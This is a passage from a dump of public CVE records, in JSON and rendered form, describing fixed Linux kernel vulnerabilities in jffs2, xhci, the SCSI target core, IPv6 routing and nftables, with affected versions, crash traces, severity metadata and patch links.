"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\njffs2: prevent xattr node from overflowing the eraseblock\n\nAdd a check to make sure that the requested xattr node size is no larger\nthan the eraseblock minus the cleanmarker.\n\nUnlike the usual inode nodes, the xattr nodes aren\u0027t split into parts\nand spread across multiple eraseblocks, which means that a xattr node\nmust not occupy more than one eraseblock. If the requested xattr value is\ntoo large, the xattr node can spill onto the next eraseblock, overwriting\nthe nodes and causing errors such as:\n\njffs2: argh. node added in wrong place at 0x0000b050(2)\njffs2: nextblock 0x0000a000, expected at 0000b00c\njffs2: error: (823) do_verify_xattr_datum: node CRC failed at 0x01e050,\nread=0xfc892c93, calc=0x000000\njffs2: notice: (823) jffs2_get_inode_nodes: Node header CRC failed\nat 0x01e00c. {848f,2fc4,0fef511f,59a3d171}\njffs2: Node at 0x0000000c with length 0x00001044 would run over the\nend of the erase block\njffs2: Perhaps the file system was created with the wrong erase size?\njffs2: jffs2_scan_eraseblock(): Magic bitmask 0x1985 not found\nat 0x00000010: 0x1044 instead\n\nThis breaks the filesystem and can lead to KASAN crashes such as:\n\nBUG: KASAN: slab-out-of-bounds in jffs2_sum_add_kvec+0x125e/0x15d0\nRead of size 4 at addr ffff88802c31e914 by task repro/830\nCPU: 0 PID: 830 Comm: repro Not tainted 6.9.0-rc3+ #1\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996),\nBIOS Arch Linux 1.16.3-1-1 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xc6/0x120\n print_report+0xc4/0x620\n ? __virt_addr_valid+0x308/0x5b0\n kasan_report+0xc1/0xf0\n ? jffs2_sum_add_kvec+0x125e/0x15d0\n ? jffs2_sum_add_kvec+0x125e/0x15d0\n jffs2_sum_add_kvec+0x125e/0x15d0\n jffs2_flash_direct_writev+0xa8/0xd0\n jffs2_flash_writev+0x9c9/0xef0\n ? __x64_sys_setxattr+0xc4/0x160\n ? do_syscall_64+0x69/0x140\n ? entry_SYSCALL_64_after_hwframe+0x76/0x7e\n [...]\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:14:58.907Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2904e1d9b64f72d291095e3cbb31634f08788b11"
},
{
"url": "https://git.kernel.org/stable/c/526235dffcac74c7823ed504dfac4f88d84ba5df"
},
{
"url": "https://git.kernel.org/stable/c/f0eea095ce8c959b86e1e57fe36ca4fea5ae54f8"
},
{
"url": "https://git.kernel.org/stable/c/a1d21bcd78cf4a4353e1e835789429c6b76aca8b"
},
{
"url": "https://git.kernel.org/stable/c/f06969df2e40ab1dc8f4364a5de967830c74a098"
},
{
"url": "https://git.kernel.org/stable/c/af82d8d2179b7277ad627c39e7e0778f1c86ccdb"
},
{
"url": "https://git.kernel.org/stable/c/8d431391320c5c5398ff966fb3a95e68a7def275"
},
{
"url": "https://git.kernel.org/stable/c/978a12c91b38bf1a213e567f3c20e2beef215f07"
},
{
"url": "https://git.kernel.org/stable/c/c6854e5a267c28300ff045480b5a7ee7f6f1d913"
}
],
"title": "jffs2: prevent xattr node from overflowing the eraseblock",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38599",
"datePublished": "2024-06-19T13:45:47.968Z",
"dateReserved": "2024-06-18T19:36:34.932Z",
"dateUpdated": "2025-11-04T17:21:43.499Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26659 (GCVE-0-2024-26659)
Vulnerability from cvelistv5
Published
2024-04-02 06:22
Modified
2025-05-04 08:53
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
xhci: handle isoc Babble and Buffer Overrun events properly
xHCI 4.9 explicitly forbids assuming that the xHC has released its
ownership of a multi-TRB TD when it reports an error on one of the
early TRBs. Yet the driver makes such assumption and releases the TD,
allowing the remaining TRBs to be freed or overwritten by new TDs.
The xHC should also report completion of the final TRB due to its IOC
flag being set by us, regardless of prior errors. This event cannot
be recognized if the TD has already been freed earlier, resulting in
"Transfer event TRB DMA ptr not part of current TD" error message.
Fix this by reusing the logic for processing isoc Transaction Errors.
This also handles hosts which fail to report the final completion.
Fix transfer length reporting on Babble errors. They may be caused by
device malfunction, no guarantee that the buffer has been filled.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26659",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T19:31:25.014647Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T19:31:33.585Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.454Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/696e4112e5c1ee61996198f0ebb6ca3fab55166e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2aa7bcfdbb46241c701811bbc0d64d7884e3346c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2e3ec80ea7ba58bbb210e83b5a0afefee7c171d3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f5e7ffa9269a448a720e21f1ed1384d118298c97"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/418456c0ce56209610523f21734c5612ee634134"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7c4650ded49e5b88929ecbbb631efb8b0838e811"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/host/xhci-ring.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "696e4112e5c1ee61996198f0ebb6ca3fab55166e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2aa7bcfdbb46241c701811bbc0d64d7884e3346c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2e3ec80ea7ba58bbb210e83b5a0afefee7c171d3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f5e7ffa9269a448a720e21f1ed1384d118298c97",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "418456c0ce56209610523f21734c5612ee634134",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7c4650ded49e5b88929ecbbb631efb8b0838e811",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/host/xhci-ring.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.213",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.152",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.82",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.17",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.213",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.152",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.82",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxhci: handle isoc Babble and Buffer Overrun events properly\n\nxHCI 4.9 explicitly forbids assuming that the xHC has released its\nownership of a multi-TRB TD when it reports an error on one of the\nearly TRBs. Yet the driver makes such assumption and releases the TD,\nallowing the remaining TRBs to be freed or overwritten by new TDs.\n\nThe xHC should also report completion of the final TRB due to its IOC\nflag being set by us, regardless of prior errors. This event cannot\nbe recognized if the TD has already been freed earlier, resulting in\n\"Transfer event TRB DMA ptr not part of current TD\" error message.\n\nFix this by reusing the logic for processing isoc Transaction Errors.\nThis also handles hosts which fail to report the final completion.\n\nFix transfer length reporting on Babble errors. They may be caused by\ndevice malfunction, no guarantee that the buffer has been filled."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:53:18.681Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/696e4112e5c1ee61996198f0ebb6ca3fab55166e"
},
{
"url": "https://git.kernel.org/stable/c/2aa7bcfdbb46241c701811bbc0d64d7884e3346c"
},
{
"url": "https://git.kernel.org/stable/c/2e3ec80ea7ba58bbb210e83b5a0afefee7c171d3"
},
{
"url": "https://git.kernel.org/stable/c/f5e7ffa9269a448a720e21f1ed1384d118298c97"
},
{
"url": "https://git.kernel.org/stable/c/418456c0ce56209610523f21734c5612ee634134"
},
{
"url": "https://git.kernel.org/stable/c/7c4650ded49e5b88929ecbbb631efb8b0838e811"
}
],
"title": "xhci: handle isoc Babble and Buffer Overrun events properly",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26659",
"datePublished": "2024-04-02T06:22:09.241Z",
"dateReserved": "2024-02-19T14:20:24.147Z",
"dateUpdated": "2025-05-04T08:53:18.681Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26845 (GCVE-0-2024-26845)
Vulnerability from cvelistv5
Published
2024-04-17 10:10
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: target: core: Add TMF to tmr_list handling
An abort that is responded to by iSCSI itself is added to tmr_list but does
not go to target core. A LUN_RESET that goes through tmr_list takes a
refcounter on the abort and waits for completion. However, the abort will
be never complete because it was not started in target core.
Unable to locate ITT: 0x05000000 on CID: 0
Unable to locate RefTaskTag: 0x05000000 on CID: 0.
wait_for_tasks: Stopping tmf LUN_RESET with tag 0x0 ref_task_tag 0x0 i_state 34 t_state ISTATE_PROCESSING refcnt 2 transport_state active,stop,fabric_stop
wait for tasks: tmf LUN_RESET with tag 0x0 ref_task_tag 0x0 i_state 34 t_state ISTATE_PROCESSING refcnt 2 transport_state active,stop,fabric_stop
...
INFO: task kworker/0:2:49 blocked for more than 491 seconds.
task:kworker/0:2 state:D stack: 0 pid: 49 ppid: 2 flags:0x00000800
Workqueue: events target_tmr_work [target_core_mod]
Call Trace:
__switch_to+0x2c4/0x470
_schedule+0x314/0x1730
schedule+0x64/0x130
schedule_timeout+0x168/0x430
wait_for_completion+0x140/0x270
target_put_cmd_and_wait+0x64/0xb0 [target_core_mod]
core_tmr_lun_reset+0x30/0xa0 [target_core_mod]
target_tmr_work+0xc8/0x1b0 [target_core_mod]
process_one_work+0x2d4/0x5d0
worker_thread+0x78/0x6c0
To fix this, only add abort to tmr_list if it will be handled by target
core.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26845",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T19:57:59.068880Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:22.368Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.663Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/425a571a7e6fc389954cf2564e1edbba3740e171"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/11f3fe5001ed05721e641f0ecaa7a73b7deb245d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/168ed59170de1fd7274080fe102216162d6826cf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a9849b67b4402a12eb35eadc9306c1ef9847d53d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e717bd412001495f17400bfc09f606f1b594ef5a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/36bc5040c863b44af06094b22f1e50059227b9cb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bd508f96b5fef96d8a0ce9cbb211d82bcfc2341f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/83ab68168a3d990d5ff39ab030ad5754cbbccb25"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/target/target_core_device.c",
"drivers/target/target_core_transport.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "425a571a7e6fc389954cf2564e1edbba3740e171",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "11f3fe5001ed05721e641f0ecaa7a73b7deb245d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "168ed59170de1fd7274080fe102216162d6826cf",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a9849b67b4402a12eb35eadc9306c1ef9847d53d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e717bd412001495f17400bfc09f606f1b594ef5a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "36bc5040c863b44af06094b22f1e50059227b9cb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bd508f96b5fef96d8a0ce9cbb211d82bcfc2341f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "83ab68168a3d990d5ff39ab030ad5754cbbccb25",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/target/target_core_device.c",
"drivers/target/target_core_transport.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: target: core: Add TMF to tmr_list handling\n\nAn abort that is responded to by iSCSI itself is added to tmr_list but does\nnot go to target core. A LUN_RESET that goes through tmr_list takes a\nrefcounter on the abort and waits for completion. However, the abort will\nbe never complete because it was not started in target core.\n\n Unable to locate ITT: 0x05000000 on CID: 0\n Unable to locate RefTaskTag: 0x05000000 on CID: 0.\n wait_for_tasks: Stopping tmf LUN_RESET with tag 0x0 ref_task_tag 0x0 i_state 34 t_state ISTATE_PROCESSING refcnt 2 transport_state active,stop,fabric_stop\n wait for tasks: tmf LUN_RESET with tag 0x0 ref_task_tag 0x0 i_state 34 t_state ISTATE_PROCESSING refcnt 2 transport_state active,stop,fabric_stop\n...\n INFO: task kworker/0:2:49 blocked for more than 491 seconds.\n task:kworker/0:2 state:D stack: 0 pid: 49 ppid: 2 flags:0x00000800\n Workqueue: events target_tmr_work [target_core_mod]\nCall Trace:\n __switch_to+0x2c4/0x470\n _schedule+0x314/0x1730\n schedule+0x64/0x130\n schedule_timeout+0x168/0x430\n wait_for_completion+0x140/0x270\n target_put_cmd_and_wait+0x64/0xb0 [target_core_mod]\n core_tmr_lun_reset+0x30/0xa0 [target_core_mod]\n target_tmr_work+0xc8/0x1b0 [target_core_mod]\n process_one_work+0x2d4/0x5d0\n worker_thread+0x78/0x6c0\n\nTo fix this, only add abort to tmr_list if it will be handled by target\ncore."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:50.292Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/425a571a7e6fc389954cf2564e1edbba3740e171"
},
{
"url": "https://git.kernel.org/stable/c/11f3fe5001ed05721e641f0ecaa7a73b7deb245d"
},
{
"url": "https://git.kernel.org/stable/c/168ed59170de1fd7274080fe102216162d6826cf"
},
{
"url": "https://git.kernel.org/stable/c/a9849b67b4402a12eb35eadc9306c1ef9847d53d"
},
{
"url": "https://git.kernel.org/stable/c/e717bd412001495f17400bfc09f606f1b594ef5a"
},
{
"url": "https://git.kernel.org/stable/c/36bc5040c863b44af06094b22f1e50059227b9cb"
},
{
"url": "https://git.kernel.org/stable/c/bd508f96b5fef96d8a0ce9cbb211d82bcfc2341f"
},
{
"url": "https://git.kernel.org/stable/c/83ab68168a3d990d5ff39ab030ad5754cbbccb25"
}
],
"title": "scsi: target: core: Add TMF to tmr_list handling",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26845",
"datePublished": "2024-04-17T10:10:09.337Z",
"dateReserved": "2024-02-19T14:20:24.182Z",
"dateUpdated": "2025-05-04T08:57:50.292Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52340 (GCVE-0-2023-52340)
Vulnerability from cvelistv5
Published
2024-07-05 00:00
Modified
2025-11-04 17:14
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
The IPv6 implementation in the Linux kernel before 6.3 has a net/ipv6/route.c max_size threshold that can be consumed easily, e.g., leading to a denial of service (network is unreachable errors) when IPv6 packets are sent in a loop via a raw socket.
References
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52340",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-05T13:36:20.176084Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-400",
"description": "CWE-400 Uncontrolled Resource Consumption",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-03-20T13:48:52.741Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:14:06.189Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=af6d10345ca76670c1b7c37799f0d5576ccef277"
},
{
"tags": [
"x_transferred"
],
"url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.3"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240816-0005/"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The IPv6 implementation in the Linux kernel before 6.3 has a net/ipv6/route.c max_size threshold that can be consumed easily, e.g., leading to a denial of service (network is unreachable errors) when IPv6 packets are sent in a loop via a raw socket."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T02:01:14.688Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=af6d10345ca76670c1b7c37799f0d5576ccef277"
},
{
"url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.3"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-52340",
"datePublished": "2024-07-05T00:00:00.000Z",
"dateReserved": "2024-01-12T00:00:00.000Z",
"dateUpdated": "2025-11-04T17:14:06.189Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-52628 (GCVE-0-2023-52628)
Vulnerability from cvelistv5
Published
2024-03-28 07:33
Modified
2025-11-04 17:14
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nftables: exthdr: fix 4-byte stack OOB write
If priv->len is a multiple of 4, then dst[len / 4] can write past
the destination array which leads to stack corruption.
This construct is necessary to clean the remainder of the register
in case ->len is NOT a multiple of the register size, so make it
conditional just like nft_payload.c does.
The bug was added in 4.1 cycle and then copied/inherited when
tcp/sctp and ip option support was added.
Bug reported by Zero Day Initiative project (ZDI-CAN-21950,
ZDI-CAN-21951, ZDI-CAN-21961).
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 49499c3e6e18b7677a63316f3ff54a16533dc28f Version: 49499c3e6e18b7677a63316f3ff54a16533dc28f Version: 49499c3e6e18b7677a63316f3ff54a16533dc28f Version: 49499c3e6e18b7677a63316f3ff54a16533dc28f Version: 49499c3e6e18b7677a63316f3ff54a16533dc28f Version: 49499c3e6e18b7677a63316f3ff54a16533dc28f Version: 49499c3e6e18b7677a63316f3ff54a16533dc28f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52628",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-28T18:07:47.232629Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:24:11.510Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:14:07.549Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
